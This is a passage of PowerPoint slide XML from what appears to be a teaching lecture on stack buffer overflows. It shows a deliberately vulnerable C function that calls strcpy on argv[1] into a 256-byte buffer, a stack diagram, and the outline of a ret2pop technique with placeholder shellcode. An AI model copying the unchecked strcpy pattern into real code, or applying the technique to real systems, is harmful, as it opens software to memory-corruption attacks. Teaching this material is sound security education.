            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>might consider this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>technique when</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Text section isn’t randomized (uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> of ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>instr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Can overwrite pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> that points to stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is higher on the stack than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="3355975"/>
            <a:ext cx="4267200" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>void f(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  char buffer[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> no = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = &amp;no;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  f(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="Table 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1756816750"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2100585" y="3355975"/>
          <a:ext cx="1785615" cy="3197225"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1785615"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>no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2000" dirty="0" smtClean="0"/>
                        <a:t>&amp;no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2000" dirty="0" smtClean="0"/>
                        <a:t>...</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2000" dirty="0" smtClean="0"/>
                        <a:t>saved ret</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2000" dirty="0" smtClean="0"/>
                        <a:t>saved </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                        <a:t>ebp</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216025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>buffer</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custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206112043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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2pop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40962" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>If there is a valuable (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> on a stack, you might consider this technique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="stack3.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540000"/>
            <a:ext cx="1690687" cy="418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spect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2425700" y="4578350"/>
            <a:ext cx="1235075" cy="18796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rgbClr val="FFFFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>overwrite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2419350" y="4095750"/>
            <a:ext cx="124777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FFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&amp;ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2419350" y="3638550"/>
            <a:ext cx="124777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FFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&amp;pop-ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="949325" y="4318000"/>
            <a:ext cx="1246188" cy="369888"/>
            <a:chOff x="945163" y="4318669"/>
            <a:chExt cx="1245430" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Notched Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1521075" y="4469255"/>
              <a:ext cx="669518" cy="166436"/>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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40973" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="945163" y="4318669"/>
              <a:ext cx="5326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latin typeface="Trebuchet MS" charset="0"/>
                </a:rPr>
                <a:t>esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2709863" y="3249613"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3900755" y="2880654"/>
            <a:ext cx="5094287" cy="3509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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3662363" y="2752873"/>
            <a:ext cx="4021673" cy="892552"/>
            <a:chOff x="3662363" y="2752873"/>
            <a:chExt cx="4021673" cy="892552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3662363" y="2911884"/>
              <a:ext cx="1264043" cy="25655"/>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953000" y="2752873"/>
              <a:ext cx="2731036" cy="892552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>(assume perfected)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1926383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0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.00046 L -4.68934E-6 -0.05738 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2846"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="30" fill="hold" nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="31" fill="hold" nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.05738 L -4.68934E-6 -0.12518 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3401"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="34" fill="hold" nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="35" fill="hold" nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
